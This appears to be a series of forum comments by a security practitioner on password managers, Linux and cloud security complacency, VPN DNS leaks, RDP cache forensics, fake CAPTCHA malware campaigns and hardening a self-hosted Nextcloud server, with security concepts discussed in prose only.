It’s also not really a bug. It’s just understanding that whitespace characters are often ignored and can be used to push a command past the end of the textbox in the “edit shortcut” form. I’m not sure I really see a fix for it either. Granted, I think always showing file extensions would be a good start; but, that horse is so long out of the barn it’s grown old and died in the woods. Much like hyperlinks, I think people just need to learn to be careful where they put their click.
You could create one with the normal shortcut editor, which is built right into Windows. As for considering Windows a risk, well yes it is.
This is going to be a teaching moment for cyber security.
This really is solvable with a KeePass setup, but it is harder. I use KeePass and host my own Nextcloud instance. One of the files I have up there is my KeePass database. If I need one of my passwords, I access it from my phone and type it in. If I really, really wanted to drop my password database on someone else’s computer, I could login to my Nextcloud instance via a web browser, pull down the file and run KeePass as a portable executable (not installed). It’d be a PITA (and there are some caveats around this process), but it’s certainly possible.
That said, online password managers make sense for a lot of use cases. I generally recommend BitWarden when people ask me for what to use. The whole “KeePass and manual sync” answer really only works for those folks who want to self host lots of things. And it brings its own set of risks with it. I’m the type of weirdo who is running splunk locally, feed all my logs into it and have dashboards setup (and looked at regularly) dealing with security. I have no expectation that my wife will do that and so she uses BitWarden.
I think the most important thing to convince people of is “use a password manager”. The problem TommySoda brought up is very real:
While I understand that password reuse is a problem I also understand that remembering 50+ passwords, because literally everything requires you to make an account, is impossible.
The hard thing to teach people is that, you don’t actually need to know those 50+ passwords, nor should you care what they are. With a password manager, they can be the crazy unique 20 character, random string of letters, numbers, symbols, upper and lower case characters. And you won’t care. Open the website, and either copy/paste the password or (if you password manager supports it) use the auto-type feature. There are risks to each; but, nothing will ever be without risk. Just please folks, stop reusing passwords. That’s bad, m’kay.
Sounds more like a feature than a bug.
I tried that, I ended up with this weird “Windows 11” adware installed and couldn’t get rid of it. There was also a problem with odd programs and advertising showing up in my Start Menu, even after I removed them. Also, my settings would occasionally just change, without my knowledge or permission.
It depends on the environment. I’ve been in a couple of places which use Linux for various professional purposes. At one site, all systems with a network connection were required to have A/V, on-access scanning and regular system scans. So, even the Linux systems had a full A/V agent and we were in the process of rolling out EDR to all Linux based hosts when I left. That was a site where security tended to be prioritized, though much of it was also “checkbox security”. At another site, A/V didn’t really exist on Linux systems and they were basically black boxes on the network, with zero security oversight. Last I heard, that was finally starting to change and Linux hosts were getting the full A/V and EDR treatment. Though, that’s always a long process. I also see a similar level of complacency in “the cloud”. Devs spin random shit up, give it a public IP, set the VPS to a default allow and act like it’s somehow secure because, “it’s in the cloud”. Some of that will be Linux based. And in six months to a year, it’s woefully out of date, probably running software with known vulnerabilities, fully exposed to the internet and the dev who spun it up may or may not be with the company anymore. Also, since they were “agile”, the documentation for the system is filed under “lol, wut?”
Overall, I think Linux systems are a mixed bag. For a long time, they just weren’t targeted with normal malware. And this led to a lot of complacency. Most sites I have been at have had a few Linux systems kicking about; but, because they were “one off” systems and from a certain sense of invulnerability they were poorly updated and often lacked a secure baseline configuration. The whole “Linux doesn’t get malware” mantra was used to avoid security scrutiny. At the same time, Linux system do tend to default to a more secure configuration. You’re not going to get a BlueKeep type vulnerability from a default config. Still, it’s not hard for someone who doesn’t know any better to end up with a vulnerable system. And things like ransomware, password stealers, RATs or other basic attacks often run just fine in a user context. It’s only when the attacker needs to get root that things get harder.
In a way, I’d actually appreciate a wide scale, well publicized ransomware attack on Linux systems. First off, it would show that Linux is finally big enough for attackers to care about. Second, it would provide concrete proof as to why Linux systems should be given as much attention and centrally managed/secured in the Enterprise. I know everyone hates dealing with IT for provisioning systems, and the security software sucks balls; but, given the constant barrage of attacks, those sorts of things really are needed.
I think the most surprising thing here is that 60% of networks don’t allow any/any. I swear, the number of devs I’ve had to convince that they don’t actually need to plop their MySQL backend on the open web, to allow their web front end to reach it, is way higher than it should be. Folks moved their workloads to “the cloud” and decided that we needed to internet like it was 1999.
It depends on what your goals are.
Ultimately, it’s going to come down to what you are trying to do and why you want to run multiple Operating Systems. For example, my main system is running Linux. But, I want the ability to run Windows malware in a controlled sandbox (not a euphemism, I work in cybersecurity and lab some stuff for fun). So, I have KVM setup to run Virtual Machines, including Windows.
For another example, prior to making the switch to Linux, I had Windows as my primary OS and booted Linux on a USB stick (not Ventoy, but close enough). This let me gain confidence that I would be able to make the jump.
I don’t have a good example for dual booting. Maybe something like a SteamDeck where you want a stable, functional OS most of the time; but, have some games which will only run in Windows.
It makes little sense why it works on an offsite WiFi, but not mobile data.
I’d agree with unbuckled above, it’s a DNS issue. If your mobile device is capable, use nslookup or dig to see what responses you are getting in different scenarios. It’s possible that your VPN software is leaking DNS queries out to the mobile data provider’s DNS servers while you are on mobile data and only using the correct DNS settings when you are on wifi. Possibly look for split tunnel settings in the VPN software, as this can create this type of situation.
You can also confirm this from the pihole side. Connect to the VPN via mobile data and browse to some website you don’t use often, but is not your own internal stuff. Then open the query log on your pihole and see if that domain shows up. I’d put money on that query not showing in the pihole query log.
I’m kinda confused. This looks like really old information re-packaged as some sort of “exploit”. Examining the RDP cache is an old trick. Here’s a video on doing it from six years ago:
https://www.youtube.com/watch?v=NnEOk5-Dstw
The tools for doing this, have been out for a long time. Here’s the EnCase tool:
https://marketplace.opentext.com/cybersecurity/content/rdp-cached-bitmap-extractor
Here’s an open source parser:
https://github.com/ANSSI-FR/bmc-tools
So, what’s new here and how is this allowing “Attackers to Take Over Windows and Browser Sessions” other than, if they are on a system, they can dig through the RDP cache? Which, if they are already on the system which launched the RDP sessions, the horse is long out of the barn. Between credential dumping, keylogging and pass the hash, the attacker probably has as much access as the local user has anyway.
It’s a neat idea for something which is going to be used primarily for web browsing and word processing. It’s using an ARM Cortex CPU with up to 16GB of memory. It should run most popular flavors of Linux, there are ARM64 packages for LibreOffice and FireFox, so the basics are covered. All in all, a fun idea for a minimal system.
The other 16% just didn’t notice.
We’ve been seeing these types attacks for a couple of months, mostly not from telegram links. The way they work is pretty ingenious, in that is leverages the fact that everyone has gotten used to the various “do this thing to prove you’re human”. In this case the attack works like:
The payloads we’ve seen have been info stealers (RedLine, Lumma Stealer, etc.). They also drop some type of Remote Access Tool (e.g. AnyDesk) which the attacker could come back to later, move laterally and try to deploy ransomware.
Unless we have a way around general relativity, boring will describe any conservation with another civilization.
Hello.
wait 1000 years
Hi. How are you?
wait 1000 years
Who the fuck are these guys?
Space is really, really, really big. And by comparison any form of communication we have yet discovered is very slow.
Along with the things others have said (Backups, Linux, Docker, Networking) I’d also recommend getting comfortable with server and network security. A lot of this is wrapped up in the simple mantra “install your goddamn updates!” But, there is more to it than that. For example, if you go with Nextcloud, read through their hardening guide and seriously consider implementing all of the recommendation. Also think through how you intend to manage both the server and instance. If this is all local, then it is easier as you can keep SSH access to the server firewalled off from the internet. If you host part of your stuff “in the cloud”, you’ll want to start looking at limiting down access and using keys to login (which is good practice for all situations). Also, never use default credentials. You may also want to familiarize yourself with the logs provided by the applications and maybe setup some monitoring around them. I personally run Nextcloud and I feed all my logs into Splunk (you can run a free instance in a docker container). I have a number of dashboards I look at every morning to keep an eye on things. E.g. Failed/successful logins, traffic sources, URI requests, file access, etc. If your server is attached to the internet it will be under attack constantly. Fail2Ban on my wireguard container banned 112 IP addresses over the last 24 hours, for 3 failed attempts to login via SSH. Less commonly, attackers try to log in to my Nextcloud instance. And my WordPress site is under constant attack. If you choose to run Wordpress, be very careful about the plugins you choose to install, and then keep them up to date. Wordpress itself is reasonably secure, the plugins are a shit-show and worse when they aren’t kept up to date.
they will find escape goats.
Well now I want to stick around. Who wouldn’t want an escape goat?
I don’t quite understand, what do you mean by “KISS is not available via pacman”
I was making a joke about Arch not being simple and pacman not having packages one would expect, often having to turn to AUR to find such packages. Seems the joke failed to land and now we’re in “explaining a joke is similar to dissecting a frog” territory.
IT installed a firewall between the legacy environment and everything else. Devs threw a fit and so the firewall was configured with a default allow rule. Security was last seen crying into their beer.
Maybe we should consider, not letting everyone setup whatever the fuck they want, whenever the they want, however they want and assuming it’s all good because, “it’s in the cloud”. And then that setup gets either dumped in IT’s lap in it’s half-assed state (if you’re lucky) or is left running, long forgotten, until an attacker finds it and informs the organization about it’s continued existence by spinning up a coin miner.
“The cloud” does need a lot of work on configuration management. But, that doesn’t mean just another fancy tool to fix the fuckups. It means policies and procedures to make the broken configs harder to implement in the first place. But that doesn’t have AI and flashy dashboards to wow the execs into spending more money. It just has users whining about waiting for an understaffed IT organization not getting things done “right now” for a project that has a deadline i tomorrow, which has been known about for three months.